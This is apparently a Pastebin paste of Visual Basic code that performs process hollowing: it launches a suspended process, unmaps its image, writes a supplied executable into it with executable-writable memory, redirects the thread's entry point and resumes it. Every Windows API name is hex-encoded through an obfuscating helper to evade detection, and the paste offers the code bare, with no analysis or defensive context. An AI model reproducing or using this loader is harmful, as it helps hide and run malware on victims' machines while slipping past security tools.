Data hosted with ♥ by Pastebin.com - Download Raw - See Original
  1. 'kernel32
  2. lKernel = LoadLibrary(nlfpkgnrj("6B65726E656C3332"))
  3.  
  4. 'ntdll
  5. lNTDll = LoadLibrary(nlfpkgnrj("6E74646C6C"))
  6.  
  7. If sHost = vbNullString Then
  8.     sHost = Space(260)
  9.  
  10.     'GetModuleFileNameW
  11.    lMod = GetProcAddress(lKernel, nlfpkgnrj("4765744D6F64756C6546696C654E616D6557"))
  12.     Invoke lMod, App.hInstance, StrPtr(sHost), 260
  13. End If
  14.  
  15. With tIMAGE_NT_HEADERS.OptionalHeader
  16.  
  17.     tSTARTUPINFO.cb = Len(tSTARTUPINFO)
  18.  
  19.     'CreateProcessW
  20.    lMod = GetProcAddress(lKernel, nlfpkgnrj("43726561746550726F6365737357"))
  21.     Invoke lMod, 0, StrPtr(sHost), 0, 0, 0, CREATE_SUSPENDED, 0, 0, VarPtr(tSTARTUPINFO), VarPtr(tPROCESS_INFORMATION)
  22.  
  23.     'NtUnmapViewOfSection
  24.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74556E6D6170566965774F6653656374696F6E"))
  25.     Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase
  26.  
  27.     'VirtualAllocEx
  28.    lMod = GetProcAddress(lKernel, nlfpkgnrj("5669727475616C416C6C6F634578"))
  29.     Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, .SizeOfImage, MEM_COMMIT Or MEM_RESERVE, PAGE_EXECUTE_READWRITE
  30.  
  31.     'NtWriteVirtualMemory
  32.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279"))
  33.     Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase, VarPtr(bvBuff(0)), .SizeOfHeaders, 0
  34.  
  35.     For i = 0 To tIMAGE_NT_HEADERS.FileHeader.NumberOfSections - 1
  36.         CpyMem tIMAGE_SECTION_HEADER, bvBuff(tIMAGE_DOS_HEADER.e_lfanew + SIZE_NT_HEADERS + SIZE_IMAGE_SECTION_HEADER * i), Len(tIMAGE_SECTION_HEADER)
  37.         Invoke lMod, tPROCESS_INFORMATION.hProcess, .ImageBase + tIMAGE_SECTION_HEADER.VirtualAddress, VarPtr(bvBuff(tIMAGE_SECTION_HEADER.PointerToRawData)), tIMAGE_SECTION_HEADER.SizeOfRawData, 0
  38.     Next i
  39.  
  40.     tCONTEXT.ContextFlags = CONTEXT_FULL
  41.  
  42.     'NtGetContextThread
  43.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74476574436F6E74657874546872656164"))
  44.     Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
  45.  
  46.     'NtWriteVirtualMemory
  47.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E7457726974655669727475616C4D656D6F7279"))
  48.     Invoke lMod, tPROCESS_INFORMATION.hProcess, tCONTEXT.Ebx + 8, VarPtr(.ImageBase), 4, 0
  49.  
  50.     tCONTEXT.Eax = .ImageBase + .AddressOfEntryPoint
  51.  
  52.     'NtSetContextThread
  53.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74536574436F6E74657874546872656164"))
  54.     Invoke lMod, tPROCESS_INFORMATION.hThread, VarPtr(tCONTEXT)
  55.  
  56.     'NtResumeThread
  57.    lMod = GetProcAddress(lNTDll, nlfpkgnrj("4E74526573756D65546872656164"))
  58.     Invoke lMod, tPROCESS_INFORMATION.hThread, 0
  59.  
  60.     hProc = tPROCESS_INFORMATION.hProcess
  61. End With